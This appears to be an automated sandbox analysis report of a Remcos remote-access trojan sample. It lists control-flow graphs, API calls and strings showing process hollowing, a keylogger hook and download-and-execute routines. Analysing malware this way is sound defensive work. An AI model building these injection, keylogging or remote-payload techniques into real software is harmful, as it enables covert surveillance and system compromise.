183->191 184->191 212 40ee51 191->212 213 40ee44-40ee4f call 436e90 191->213 205->177 218 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 212->218 213->218 273 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 218->273 287 40efc1 236->287 288 40efdc-40efde 236->288 273->236 286 40eece-40eeed call 401e65 call 41bc5e call 40f474 273->286 286->236 306 40eeef 286->306 292 40efc3-40efda call 41cd9b CreateThread 287->292 289 40efe0-40efe2 288->289 290 40efe4 288->290 289->292 293 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 290->293 292->293 344 40f101 293->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 293->345 306->93 346 40f103-40f11b call 401e65 call 401fab 344->346 345->346 357 40f159-40f16c call 401e65 call 401fab 346->357 358 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 346->358 368 40f1cc-40f1df call 401e65 call 401fab 357->368 369 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 368->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 368->380 369->368 379->380 402 40f240-40f241 SetProcessDEPPolicy 380->402 403 40f243-40f256 CreateThread 380->403 402->403 404 40f264-40f26b 403->404 405 40f258-40f262 CreateThread 403->405 408 40f279-40f280 404->408 409 40f26d-40f277 CreateThread 404->409 405->404 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 415 40f287-40f28c 412->415 416 40f2cc-40f2df call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 425 40f2e4-40f2e7 416->425 418->416 425->157 427 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 425->427 443 40f346-40f34b DeleteFileW 427->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                                                    APIs
                                                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe,00000104), ref: 0040E9EE
                                                                      • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                    • String ID: SG$ SG$0%s$Access Level: $Administrator$C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                    • API String ID: 2830904901-1042402345
                                                                    • Opcode ID: d7b26d2f8c4125b6565ba51e4b2aec47ec173fe99001210e728892926a360d21
                                                                    • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                                                    • Opcode Fuzzy Hash: d7b26d2f8c4125b6565ba51e4b2aec47ec173fe99001210e728892926a360d21
                                                                    • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 448 4180ef-418118 449 41811c-418183 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 418480 449->450 451 418189-418190 449->451 453 418482-41848c 450->453 451->450 452 418196-41819d 451->452 452->450 454 4181a3-4181a5 452->454 454->450 455 4181ab-4181d8 call 436e90 * 2 454->455 455->450 460 4181de-4181e9 455->460 460->450 461 4181ef-41821f CreateProcessW 460->461 462 418225-41824d VirtualAlloc Wow64GetThreadContext 461->462 463 41847a GetLastError 461->463 464 418253-418273 ReadProcessMemory 462->464 465 418444-418478 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->465 463->450 464->465 466 418279-41829b NtCreateSection 464->466 465->450 466->465 467 4182a1-4182ae 466->467 468 4182c1-4182e3 NtMapViewOfSection 467->468 469 4182b0-4182bb NtUnmapViewOfSection 467->469 470 4182e5-418322 VirtualFree NtClose TerminateProcess 468->470 471 41832d-418354 GetCurrentProcess NtMapViewOfSection 468->471 469->468 470->449 472 418328 470->472 471->465 473 41835a-41835e 471->473 472->450 474 418360-418364 473->474 475 418367-418385 call 436910 473->475 474->475 478 4183c7-4183d0 475->478 479 418387-418395 475->479 480 4183f0-4183f4 478->480 481 4183d2-4183d8 478->481 482 418397-4183ba call 436910 479->482 484 4183f6-418413 WriteProcessMemory 480->484 485 418419-418430 Wow64SetThreadContext 480->485 481->480 483 4183da-4183ed call 418503 481->483 493 4183bc-4183c3 482->493 483->480 484->465 488 418415 484->488 485->465 489 418432-41843e ResumeThread 485->489 488->485 489->465 492 418440-418442 489->492 492->453 493->478
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                                    • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                                                    • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00418293
                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182BB
                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 004182DB
                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                                                    • NtClose.NTDLL(?), ref: 004182F7
                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                                                    • NtMapViewOfSection.NTDLL(?,00000000), ref: 0041834C
                                                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                                                    • ResumeThread.KERNEL32(?), ref: 00418435
                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                                                    • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                                                    • NtUnmapViewOfSection.NTDLL(00000000), ref: 0041845E
                                                                    • NtClose.NTDLL(?), ref: 00418468
                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                                                    • GetLastError.KERNEL32 ref: 0041847A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                                    • API String ID: 3150337530-108836778
                                                                    • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                                    • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                                                    • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                                    • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1621 40a2b8-40a2cf 1622 40a2d1-40a2eb SetWindowsHookExA 1621->1622 1623 40a333-40a343 GetMessageA 1621->1623 1622->1623 1628 40a2ed-40a331 GetLastError call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1622->1628 1624 40a345-40a35d TranslateMessage DispatchMessageA 1623->1624 1625 40a35f 1623->1625 1624->1623 1624->1625 1626 40a361-40a366 1625->1626 1628->1626
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                                                    • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                                                    • GetLastError.KERNEL32 ref: 0040A2ED
                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                                                    • TranslateMessage.USER32(?), ref: 0040A34A
                                                                    • DispatchMessageA.USER32(?), ref: 0040A355
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                    • String ID: Keylogger initialization failure: error $`#v
                                                                    • API String ID: 3219506041-3226811161
                                                                    • Opcode ID: ec3267f7fe9ce1a5c416a87d0f27317f5ce465ea5ea3d17c54d1027c97c75435
                                                                    • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                                                    • Opcode Fuzzy Hash: ec3267f7fe9ce1a5c416a87d0f27317f5ce465ea5ea3d17c54d1027c97c75435
                                                                    • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1639 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1646 10001177-1000119e lstrlenW FindFirstFileW 1639->1646 1647 10001168-10001172 lstrlenW 1639->1647 1648 100011a0-100011a8 1646->1648 1649 100011e1-100011e9 1646->1649 1647->1646 1650 100011c7-100011d8 FindNextFileW 1648->1650 1651 100011aa-100011c4 call 10001000 1648->1651 1650->1648 1653 100011da-100011db FindClose 1650->1653 1651->1650 1653->1649
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                    • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                    • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                    • String ID:
                                                                    • API String ID: 1083526818-0
                                                                    • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                    • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                    • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                    • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1655 406eb0-406f05 call 401fab call 4041a2 call 4020f6 * 2 call 41be1b 1666 406f0b-406f0e 1655->1666 1667 40702e-40704c call 401e65 call 405b05 1655->1667 1669 406f14-406f32 call 401e65 call 405b05 1666->1669 1670 40716d-40718f call 401e8d call 401fd8 * 2 1666->1670 1680 407052-4070a8 call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f04 call 401e65 call 401fab URLDownloadToFileW 1667->1680 1681 4070eb-4070ff call 401e65 call 405b05 1667->1681 1686 406f38-406f61 call 401e65 call 401fab call 401e65 call 401fab call 40da34 1669->1686 1687 406fda-406fee call 401e65 call 405b05 1669->1687 1753 406f8d-406fa2 call 401e65 call 401fab 1680->1753 1754 4070ae-4070b8 1680->1754 1681->1670 1702 407101-407129 call 401e65 call 401fab call 41b9f6 1681->1702 1727 406f66-406f87 call 401f04 call 401e65 call 41c4f2 1686->1727 1687->1670 1708 406ff4-407018 call 401e65 call 401fab call 418568 1687->1708 1733 407151-407156 1702->1733 1734 40712b-407149 call 418568 call 43bd4c 1702->1734 1736 407024-407029 1708->1736 1737 40701a-40701f 1708->1737 1727->1753 1727->1754 1739 40715b-407168 call 402093 call 404aa1 1733->1739 1734->1733 1736->1739 1737->1739 1739->1670 1765 4070c1-4070c6 1753->1765 1766 406fa8-406fca call 401f04 ShellExecuteW 1753->1766 1756 4070cb-4070d8 call 402093 call 404aa1 1754->1756 1764 4070dd-4070e6 call 401f09 1756->1764 1764->1670 1765->1756 1771 406fd0-406fd5 1766->1771 1772 4070ba-4070bf 1766->1772 1771->1756 1772->1756
                                                                    APIs
                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                                                    Strings
                                                                    • aF, xrefs: 004070F1
                                                                    • open, xrefs: 00406FB6
                                                                    • aF, xrefs: 00406FE0
                                                                    • C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, xrefs: 00407007, 0040712F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DownloadExecuteFileShell
                                                                    • String ID: aF$ aF$C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe$open
                                                                    • API String ID: 2825088817-1821125449
                                                                    • Opcode ID: 89f85845d56dd6ef664731934432dbd022d0525eb67f6b588d6f4d56bf05f1bb
                                                                    • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                                                    • Opcode Fuzzy Hash: 89f85845d56dd6ef664731934432dbd022d0525eb67f6b588d6f4d56bf05f1bb
                                                                    • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                                                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                                                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                                                    Strings
                                                                    • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandleOpen$FileRead
                                                                    • String ID: http://geoplugin.net/json.gp
                                                                    • API String ID: 3121278467-91888290
                                                                    • Opcode ID: 715bb13e36d7f94650e38528baf69c40dba8c7692c2ea5b5f9dd98b44b5d3a7c
                                                                    • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                                                    • Opcode Fuzzy Hash: 715bb13e36d7f94650e38528baf69c40dba8c7692c2ea5b5f9dd98b44b5d3a7c
                                                                    • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                                                    APIs
                                                                      • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                                                    • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                                                    • GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                                                    • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                                                      • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                                                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                                                      • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                                                      • Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                    • String ID:
                                                                    • API String ID: 3950776272-0
                                                                    • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                                    • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                                                    • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                                    • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                                                    APIs
                                                                      • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                                      • Part of subcall function 00413549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                                                      • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                                                                    • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                                                    • ExitProcess.KERNEL32 ref: 0040F8CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
